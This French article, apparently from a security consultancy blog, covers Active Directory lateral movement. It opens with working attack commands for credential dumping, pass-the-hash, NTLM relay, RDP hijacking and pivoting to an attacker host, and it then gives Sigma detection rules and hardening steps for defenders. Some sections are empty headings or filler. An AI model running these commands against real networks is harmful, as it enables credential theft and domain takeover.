Mouvement Latéral : Techniques d'Attaque, Détection et

# Extraction des hashes depuis la mémoire LSASS avec Mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

# Extraction depuis la base SAM (nécessite SYSTEM)
mimikatz # lsadump::sam

# Extraction distante avec secretsdump (Impacket)
secretsdump.py domain/admin:password@target

# Dump LSASS via comsvcs.dll (LOLBin - Living Off the Land)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\temp\lsass.dmp full

# Pass-the-Hash avec Impacket (psexec)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 domain/admin@192.168.1.10

# Pass-the-Hash avec CrackMapExec
crackmapexec smb 192.168.1.0/24 -u admin -H e19ccf75ee54e06b06a5907af13cef42

# Pass-the-Hash avec Evil-WinRM
evil-winrm -i 192.168.1.10 -u admin -H e19ccf75ee54e06b06a5907af13cef42

# Export de tous les tickets Kerberos en mémoire (Mimikatz)
mimikatz # sekurlsa::tickets /export

# Injection d'un ticket TGT volé dans la session courante
mimikatz # kerberos::ptt ticket_admin@krbtgt~DOMAIN.LOCAL.kirbi

# Vérification du ticket injecté
klist

# Avec Rubeus (.NET)
Rubeus.exe dump /nowrap
Rubeus.exe ptt /ticket:<base64_ticket>

# Overpass-the-Hash avec Mimikatz
mimikatz # sekurlsa::pth /user:admin /domain:corp.local /ntlm:e19ccf75ee54e06b06a5907af13cef42 /run:cmd.exe

# Overpass-the-Hash avec Rubeus (AES256 key - plus furtif)
Rubeus.exe asktgt /user:admin /domain:corp.local /aes256:<aes256_key> /ptt /opsec

# Avec Impacket (getTGT)
getTGT.py -hashes :e19ccf75ee54e06b06a5907af13cef42 corp.local/admin

# NTLM Relay avec Impacket - ntlmrelayx
# Étape 1 : Poisonner LLMNR/NBT-NS pour capturer les authentifications
sudo responder -I eth0 -rdw

# Étape 2 : Relayer les authentifications vers les cibles sans SMB Signing
ntlmrelayx.py -tf targets.txt -smb2support

# Variante : relay vers LDAP pour modifier l'AD (ajouter un utilisateur)
ntlmrelayx.py -t ldap://dc01.corp.local --escalate-user attacker

# Variante : relay vers HTTP pour accéder à Exchange (EWS)
ntlmrelayx.py -t https://mail.corp.local/EWS/Exchange.asmx

# PowerShell Remoting (WinRM)
Enter-PSSession -ComputerName target -Credential domain\admin

# Exécution d'une commande à distance
Invoke-Command -ComputerName target -ScriptBlock { whoami; hostname } -Credential domain\admin

# Exécution sur plusieurs serveurs en parallèle
Invoke-Command -ComputerName srv1,srv2,srv3 -ScriptBlock { Get-Process } -Credential domain\admin

# Evil-WinRM (outil offensif dédié)
evil-winrm -i target -u admin -p password -s /path/to/scripts

# DCOM via MMC20.Application (PowerShell)
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","target"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","7")

# DCOM via Impacket
dcomexec.py -object MMC20 domain/admin:password@target "whoami"
dcomexec.py -object ShellWindows domain/admin:password@target "whoami"

# Lister les sessions RDP actives
query user

# Hijacker une session (nécessite SYSTEM)
# Session ID 2 appartient à un Domain Admin connecté en RDP
tscon 2 /dest:console

# Si on est admin local mais pas SYSTEM, créer un service qui exécute tscon
sc create hijack binpath= "cmd.exe /k tscon 2 /dest:console" type= own
net start hijack

# Alternative via PsExec pour obtenir SYSTEM puis tscon
PsExec.exe -s -i cmd.exe
tscon 2 /dest:rdp-tcp#0

Les principales techniques de pivoting incluent :

# Pivoting avec SSH -- Port Forwarding Local
# Accéder au port 445 (SMB) de 10.2.0.5 via le pivot 10.1.0.10
ssh -L 4445:10.2.0.5:445 user@10.1.0.10
# Puis : smbclient -p 4445 //127.0.0.1/C$

# Pivoting avec SSH -- SOCKS Proxy dynamique
ssh -D 1080 user@10.1.0.10
# Puis : proxychains crackmapexec smb 10.2.0.0/24

# Pivoting avec Chisel (sans SSH)
# Sur le pivot (machine compromise) :
chisel server --port 8080 --reverse
# Sur l'attaquant :
chisel client 10.1.0.10:8080 R:socks

# Pivoting avec Ligolo-ng (tunnel VPN layer 3)
# Sur l'attaquant :
ligolo-proxy -selfcert
# Sur le pivot :
ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert
# Ajouter la route : ip route add 10.2.0.0/24 dev ligolo

4.3 Scénario d'attaque complet : du phishing au Domain Admin

Voici un scénario réaliste de mouvement latéral étape par étape, tel qu'observé lors d'audits de sécurité Active Directory :

Les règles Sigma formalisent les patterns de détection de manière portable entre les différents SIEM (Splunk, Elastic, Microsoft Sentinel, QRadar) :

# Règle Sigma : Pass-the-Hash via logon réseau
title: Pass-the-Hash Activity Detected
id: f8d98d6c-7a45-4b3e-9c1d-2e8f5a6b7c9d
status: stable
description: Détecte un logon réseau NTLM avec un compte admin local ou de domaine depuis un poste utilisateur
author: Ayi NEDJIMI
date: 2026/03/01
references:
    - https://attack.mitre.org/techniques/T1550/002/
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4624
        LogonType: 3
        AuthenticationPackageName: 'NTLM'
    filter_normal:
        SourceNetworkAddress|startswith:
            - '10.2.0.'  # VLAN serveurs (normal)
            - '10.0.0.'  # VLAN DC (normal)
    condition: selection and not filter_normal
level: high
tags:
    - attack.lateral_movement
    - attack.t1550.002

---
# Règle Sigma : PsExec Service Installation
title: PsExec Service Installation
id: e4c5d6f7-8a9b-4c3d-1e2f-5a6b7c8d9e0f
status: stable
description: Détecte l'installation du service PSEXESVC caractéristique de PsExec
logsource:
    product: windows
    service: system
detection:
    selection:
        EventID: 7045
        ServiceName|contains:
            - 'PSEXESVC'
            - 'PSEXEC'
            - 'meterpreter'
            - 'msf_'
    condition: selection
level: critical
tags:
    - attack.lateral_movement
    - attack.execution
    - attack.t1021.002

---
# Règle Sigma : Kerberoasting (volume anormal de TGS)
title: Potential Kerberoasting Activity
id: a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d
status: stable
description: Détecte un volume anormal de demandes TGS pour des comptes de service
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4769
        TicketEncryptionType: '0x17'  # RC4 (signe de Kerberoasting)
        ServiceName|endswith:
            - '$'
    filter:
        ServiceName: 'krbtgt'
    condition: selection and not filter | count(ServiceName) by SourceAddress > 10
    timeframe: 5m
level: high
tags:
    - attack.credential_access
    - attack.t1558.003

---
# Règle Sigma : DCSync Attack
title: DCSync Attack Detected
id: b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e
status: stable
description: Détecte une réplication de directory demandée par un non-DC
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4662
        Properties|contains:
            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'  # DS-Replication-Get-Changes
            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'  # DS-Replication-Get-Changes-All
    filter:
        SubjectUserName|endswith: '$'
        SubjectUserName|contains: 'DC'
    condition: selection and not filter
level: critical
tags:
    - attack.credential_access
    - attack.t1003.006

5.4 Analyse réseau et NDR

La détection basée sur le réseau (NDR -- Network Detection and Response) offre une perspective complémentaire indispensable, car elle observe le trafic même si l'endpoint est compromis ou l'EDR contourné :

• Détection SMB anomale : trafic SMB entre des postes utilisateurs (normalement, les postes communiquent avec les serveurs, pas entre eux). Un pic de connexions SMB port 445 entre workstations est un indicateur fort de mouvement latéral.
• Analyse Kerberos : tickets Kerberos avec un chiffrement RC4 (au lieu de AES256) signalent du Pass-the-Hash ou du Kerberoasting. Les Golden Tickets ont souvent une durée de vie de 10 ans (valeur par défaut de Mimikatz).
• Détection WMI/WinRM : connexions DCOM (port 135) ou WinRM (port 5985/5986) depuis des postes utilisateurs vers des serveurs sont suspectes si l'utilisateur n'est pas un administrateur.
• Détection de tunneling : DNS tunneling (requêtes DNS avec des sous-domaines anormalement longs), HTTP/S tunneling (beaconing régulier), et ICMP tunneling.
• Baseline comportementale : établir un profil de communication normal pour chaque segment réseau, puis détecter les déviations (nouveaux flux, nouveaux protocoles, nouveaux volumes).

# Restreindre PsExec / SMB latéral
# Désactiver le partage admin (ADMIN$, C$) sur les postes utilisateurs
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "AutoShareWks" -Value 0

# Restreindre WMI
# GPO : Computer Config > Windows Settings > Security Settings > 
# Windows Firewall > Inbound Rules > Bloquer WMI (TCP 135) sauf depuis les PAW

# Restreindre WinRM
# Activer uniquement sur les serveurs, avec authentification par certificat
Set-Item WSMan:\localhost\Client\TrustedHosts -Value ""
# Configurer WinRM via GPO pour n'accepter que les connexions depuis les PAW

# Restreindre RDP
# Désactiver RDP sur les postes utilisateurs (GPO)
# Sur les serveurs : RDP uniquement via jump servers avec NLA activé
# Activer Restricted Admin Mode pour éviter le caching de credentials
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0

# Désactiver LLMNR et NBT-NS (empêche le relay NTLM)
# GPO : Computer Config > Admin Templates > Network > DNS Client
# "Turn off multicast name resolution" = Enabled
# Désactiver NetBIOS dans les propriétés TCP/IP de chaque interface

# Activer SMB Signing (obligatoire) -- empêche le relay SMB
Set-SmbServerConfiguration -RequireSecuritySignature $true
Set-SmbClientConfiguration -RequireSecuritySignature $true

6.4 EDR et réponse automatisée

Un EDR moderne est indispensable pour la détection et le blocage en temps réel du mouvement latéral. Les capacités clés à exiger incluent :

• Détection comportementale : identification des patterns de mouvement latéral (accès LSASS, création de service distant, injection de thread) au-delà des simples signatures
• Protection LSASS : blocage des tentatives de lecture de la mémoire de LSASS par des processus non autorisés (Credential Guard matériel ou logiciel)
• Corrélation multi-endpoints : mise en relation des événements sur la source et la destination du mouvement latéral pour reconstruire la chaîne d'attaque
• Réponse automatisée : isolation réseau automatique d'une machine compromise, kill de processus malveillants, blocage de hashes connus
• Threat Hunting : capacité de recherche rétrospective dans la télémétrie (au minimum 30 jours) pour identifier les mouvements latéraux passés

Pour approfondir ce sujet, consultez notre outil open-source burpsuite-automation qui facilite l'automatisation des tests d'intrusion web.

Questions frequentes

Sources et références : MITRE ATT&CK · OWASP Testing Guide

7. Conclusion : contenir le mouvement latéral

Le mouvement latéral reste la phase la plus critique d'une intrusion. C'est le pont entre un accès initial limité et la compromission totale du système d'information. Les techniques présentées dans cet article -- Pass-the-Hash, Pass-the-Ticket, PsExec, WMI, WinRM, DCOM, RDP hijacking, pivoting -- sont utilisées quotidiennement par les groupes APT et les ransomware operators pour transformer un simple phishing en catastrophe organisationnelle.

La défense repose sur trois piliers complémentaires :

• Prévention : segmentation réseau, Credential Guard, LAPS, tiering AD, PAW, désactivation des protocoles inutiles, et durcissement des configurations
• Détection : corrélation des journaux Windows (4624, 4648, 7045), Sysmon avancé, règles Sigma, NDR pour l'analyse réseau, et EDR comportemental sur chaque endpoint
• Réponse : isolation automatique des machines compromises, playbooks de réponse aux incidents documentés, et capacité d'investigation forensique pour reconstruire la chaîne d'attaque complète

L'approche Zero Trust -- « ne jamais faire confiance, toujours vérifier » -- est le référence architectural qui adresse fondamentalement le mouvement latéral. En éliminant la confiance implicite entre les machines d'un même réseau, chaque accès devient une décision explicite basée sur l'identité, le contexte et la posture de sécurité de l'appareil.

Recommandation finale : Testez régulièrement votre capacité à détecter le mouvement latéral. Les exercices de Purple Team -- où l'équipe offensive simule les techniques documentées ici pendant que l'équipe défensive valide ses détections -- sont le moyen le plus efficace d'identifier les angles morts et d'améliorer continuellement votre posture de sécurité.

Analyse des impacts et recommandations

L'analyse des risques associés à cette problématique révèle des impacts potentiels significatifs sur la confidentialité, l'intégrité et la disponibilité des systèmes d'information. Les recommandations présentées s'appuient sur les référentiels de l'ANSSI et du NIST pour garantir une approche structurée de la remédiation.

Mise en œuvre opérationnelle

La mise en œuvre des mesures de sécurité décrites dans cet article nécessite une approche progressive, en commençant par les actions à gain rapide avant de déployer les contrôles plus complexes. Un plan d'action priorisé permet de maximiser la réduction du risque tout en respectant les contraintes opérationnelles de l'organisation.

Perspectives et évolutions

Le paysage des menaces évolue continuellement, rendant nécessaire une veille permanente et une adaptation régulière des stratégies de défense. Les tendances actuelles indiquent une sophistication croissante des techniques d'attaque et une nécessité d'automatisation accrue des processus de détection et de réponse.

Synthèse et recommandations clés

Les éléments présentés dans cette analyse mettent en lumière la nécessité d'une approche structurée face aux défis de cybersécurité actuels. La combinaison de mesures techniques, organisationnelles et humaines constitue le socle d'une posture de sécurité robuste capable de résister aux menaces les plus sophistiquées.